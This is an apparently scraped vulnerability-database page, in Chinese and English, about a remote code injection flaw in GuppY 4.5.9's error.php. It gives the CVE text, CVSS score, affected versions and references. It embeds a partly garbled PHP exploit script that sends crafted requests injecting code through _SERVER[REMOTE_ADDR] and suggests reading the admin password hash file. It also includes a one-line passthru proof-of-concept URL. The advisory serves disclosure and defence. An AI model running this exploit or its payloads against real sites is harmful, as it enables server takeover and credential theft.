发布时间 :2005-11-30 06:03:00
修订时间 :2017-07-19 21:29:06

[原文]Direct static code injection vulnerability in error.php in GuppY 4.5.9 and earlier, when register_globals is disabled, allows remote attackers to execute arbitrary PHP code via the _SERVER[REMOTE_ADDR] parameter, which is injected into a .inc script that is later included by the main script.

[CNNVD]GuppY error.php直接静态代码注入漏洞(CNNVD-200511-480)

        GuppY 是一款在终端使用的小型 Web 入口,不需要数据库的运行。
        GuppY 4.5.9及更早版本的error.php存在直接静态代码注入漏洞,在启用register_globals时,可让远程攻击者通过_SERVER[REMOTE_ADDR]参数(该参数会注入稍后将包含在主要脚本中的a .inc脚本)执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  BUGTRAQ  20051128 Guppy <= 4.5.9 Remote code execution
(UNKNOWN)  BID  15609
(UNKNOWN)  VUPEN  ADV-2005-2635
(UNKNOWN)  XF  guppy-error-file-include(23318)

- 漏洞信息

GuppY error.php直接静态代码注入漏洞
高危 输入验证
2005-11-30 00:00:00 2005-11-30 00:00:00
        GuppY 是一款在终端使用的小型 Web 入口,不需要数据库的运行。
        GuppY 4.5.9及更早版本的error.php存在直接静态代码注入漏洞,在启用register_globals时,可让远程攻击者通过_SERVER[REMOTE_ADDR]参数(该参数会注入稍后将包含在主要脚本中的a .inc脚本)执行任意PHP代码。

- 公告与补丁


- 漏洞信息 (1342)

Guppy <= 4.5.9 (REMOTE_ADDR) Remote Commands Execution Exploit (EDBID:1342)
php webapps
2005-11-28 Verified
0 rgod
N/A [点击下载]
#  if magic_quotes_gpc is off you can inject arbitrary php code (from rgod) /str0ke
#									       #
#   ---guppy459_xpl.php                                   17.30 28/11/2005     #
#                                                                              #
#    Guppy <=4.5.9 _SERVER[REMOTE_ADDR] overwrite / remote commands xctn       #
#                              coded by rgod                                   #
#                    site:                          #
#                                                                              #
#  usage: launch from Apache, fill in requested fields, then go!               #
#                                                                              #
#  Sun-Tzu:"To lift an autumn hair is no sign of great strength; to see the    #
#  sun and moon is no sign of sharp sight; to hear the noise of thunder is     #
#  no sign of a quick ear."                                                    #

ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<html><head><title> ******** Guppy <=4.5.9  remote commands xctn **********
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111;   SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color:  #1CB081; }  img
{background-color:   #FFFFFF   !important}  input  {background-color:    #303030
!important} option {  background-color:   #303030   !important}         textarea
{background-color: #303030 !important} input {color: #1CB081 !important}  option
{color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox
{background-color: #303030 !important} select {font-weight: normal;       color:
#1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;
background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:
0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em
!important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em
!important} 	h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
 ******** Guppy <=4.5.9  remote commands xctn **********</p><p class="Stile6">a
script  by  rgod  at        <a href=""target="_blank"></a></p><table width="84%"><tr><td width="43%">  <form
name="form1" method="post"  action="'.strip_tags($SERVER[PHP_SELF]).'"><p><input
type="text"  name="host"> <span class="Stile5">* hostname (
</span></p> <p><input type="text" name="path">  <span class="Stile5">* path (ex:
/guppy/  or just / ) </span></p><p><input type="text" name="command">      <span
class="Stile5"> * specify a command , "cat ./admin/mdp.php" to  see       master
database MD5 password hash( against  windows: type .\admin\mdp.php) </span> </p>
<p> <input type="text" name="port"><span class="Stile5">specify  a  port   other
than  80 ( default  value ) </span></p> <p>  <input  type="text"   name="proxy">
<span class="Stile5">  send  exploit through an  HTTP proxy (ip:port)</span></p>
<p><input type="submit" name="Submit" value="go!"></p></form> </td></tr></table>

function show($headeri)
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
if ($ji==16) {
             echo "<td>&nbsp;&nbsp;</td>";
             for ($li=0; $li<=15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
            echo "</tr><tr>";
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td>&nbsp&nbsp</td>";

for ($li=$ci*16; $li<=strlen($headeri); $li++)
                      { echo "<td>".$headeri[$li]."</td>";
echo "</tr></table>";
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
		              //next function to send packets
  global $proxy, $host, $port, $packet, $html, $proxy_regex;
  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  if ($socket < 0) {
                   echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
 		  {   $c = preg_match($proxy_regex,$proxy);
              if (!$c) {echo 'Not a valid prozy...';
                    echo "OK.<br>";
                    echo "Attempting to connect to ".$host." on port ".$port."...<br>";
                    if ($proxy=='')
		     $result = socket_connect($socket, $host, $port);

		   $parts =explode(':',$proxy);
                   echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
		   $result = socket_connect($socket, $parts[0],$parts[1]);
		   if ($result < 0) {
                                     echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
                                     echo "OK.<br><br>";
                                     $html= '';
                                     socket_write($socket, $packet, strlen($packet));
                                     echo "Reading response:<br>";
                                     while ($out= socket_read($socket, 2048)) {$html.=$out;}
                                     echo nl2br(htmlentities($html));
                                     echo "Closing socket...";

function sendpacketii($packet)
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
       if (!$ock) { echo 'No response from '.htmlentities($host);
			die; }
	   $c = preg_match($proxy_regex,$proxy);
              if (!$c) {echo 'Not a valid prozy...';
	    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
	    if (!$ock) { echo 'No response from proxy...';
if ($proxy=='')

    while (!feof($ock))
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
echo nl2br(htmlentities($html));

if (($host<>'') and ($path<>'') and ($command<>''))
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

#STEP 1 -> inject command...
$packet="GET ".$p."error.php?err=suntzu&_SERVER=&_SERVER[REMOTE_ADDR]=".$CODE." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Googlebot/Test (+\r\n";
$packet.="Connection: Close\r\n\r\n";
#now you will be redirected to an error description page, we need to see this
#url to include/execute error file...
$temp=explode('location: ',$html);
echo "Location ->".htmlentities($location)."<br>";

#STEP 2 -> Launch commands...
$packet="GET ".$p.$location." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Internet Ninja x.0\r\n";
$packet.="Connection: Close\r\n\r\n";

#STEP 3 -> lookin' for redirected output...
$packet="GET ".$p."SUNTZU HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Kenjin Spider\r\n";
$packet.="Connection: Close\r\n\r\n";


# [2005-11-28]

- 漏洞信息

GuppY error.php _SERVER[REMOTE_ADDR] Variable Remote Command Execution
Remote / Network Access
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-11-28 Unknow
2005-11-28 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

GuppY Error.PHP Remote File Include and Command Execution Vulnerability
Input Validation Error 15609
Yes No
2005-11-28 12:00:00 2007-11-15 12:36:00
Discovered by rgod.

- 受影响的程序版本

Guppy GuppY 4.5.16
Guppy GuppY 4.5.9
Guppy GuppY 4.5.4
Guppy GuppY 4.5.3 a
Guppy GuppY 4.5.3
Guppy GuppY 4.5

- 漏洞讨论

GuppY is prone to a remote file-include vulnerability and to a command-execution vulnerability.

The software fails to properly sanitize data supplied to the 'error.php' script, allowing attackers to specify remotely hosted script files to be executed in the context of the webserver hosting the vulnerable software.

An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process.

An attacker can also pass malicious PHP commands through this script to be executed on an affected server, which could facilitate unauthorized access as well.

GuppY 4.5.16 and prior versions are vulnerable.

- 漏洞利用

An exploit is not required.

Proof-of-concept examples are available:[path_to_guppy]/error.php?err=hacker&_SERVER=&_SERVER[REMOTE_ADDR]=";passthru("ls -la>README");echo"

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at:

- 相关参考